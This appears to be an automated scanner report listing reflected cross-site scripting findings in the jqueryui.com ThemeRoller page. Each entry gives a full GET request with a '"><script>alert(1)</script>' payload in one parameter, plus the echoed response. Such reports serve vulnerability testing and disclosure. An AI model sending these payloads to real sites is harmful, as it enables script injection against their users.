1.161. http://jqueryui.com/themeroller/ [iconColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3286f"><script>alert(1)</script>e150ae30ee5 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=2222223286f"><script>alert(1)</script>e150ae30ee5&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=2222223286f"><script>alert(1)</script>e150ae30ee5&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

1.162. http://jqueryui.com/themeroller/ [iconColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1510"><script>alert(1)</script>7ec6fc417d4 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888e1510"><script>alert(1)</script>7ec6fc417d4&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888e1510"><script>alert(1)</script>7ec6fc417d4&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6
...[SNIP]...

1.163. http://jqueryui.com/themeroller/ [iconColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7d24"><script>alert(1)</script>07a8ade417c was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0ad7d24"><script>alert(1)</script>07a8ade417c&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0ad7d24"><script>alert(1)</script>07a8ade417c&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

1.164. http://jqueryui.com/themeroller/ [iconColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1682"><script>alert(1)</script>1e6b425896f was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222e1682"><script>alert(1)</script>1e6b425896f&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222e1682"><script>alert(1)</script>1e6b425896f&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOp
...[SNIP]...

1.165. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d721"><script>alert(1)</script>46c3f0680d0 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff2d721"><script>alert(1)</script>46c3f0680d0&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff2d721"><script>alert(1)</script>46c3f0680d0&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

1.166. http://jqueryui.com/themeroller/ [iconColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d5a2"><script>alert(1)</script>73ac7e461b1 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=4545453d5a2"><script>alert(1)</script>73ac7e461b1&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=4545453d5a2"><script>alert(1)</script>73ac7e461b1&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa
...[SNIP]...

1.167. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59120"><script>alert(1)</script>c2a036bcbaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?59120"><script>alert(1)</script>c2a036bcbaf=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&59120"><script>alert(1)</script>c2a036bcbaf=1" type="text/css" media="all" />
...[SNIP]...

1.168. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 205ab"><script>alert(1)</script>04fa8eb0f56 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px205ab"><script>alert(1)</script>04fa8eb0f56&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:27:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px205ab"><script>alert(1)</script>04fa8eb0f56&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.169. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e3dd"><script>alert(1)</script>da16dd977e3 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px5e3dd"><script>alert(1)</script>da16dd977e3&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:27:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px5e3dd"><script>alert(1)</script>da16dd977e3&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.170. http://jqueryui.com/themeroller/ [opacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f715b"><script>alert(1)</script>7dca66d889b was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30f715b"><script>alert(1)</script>7dca66d889b&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
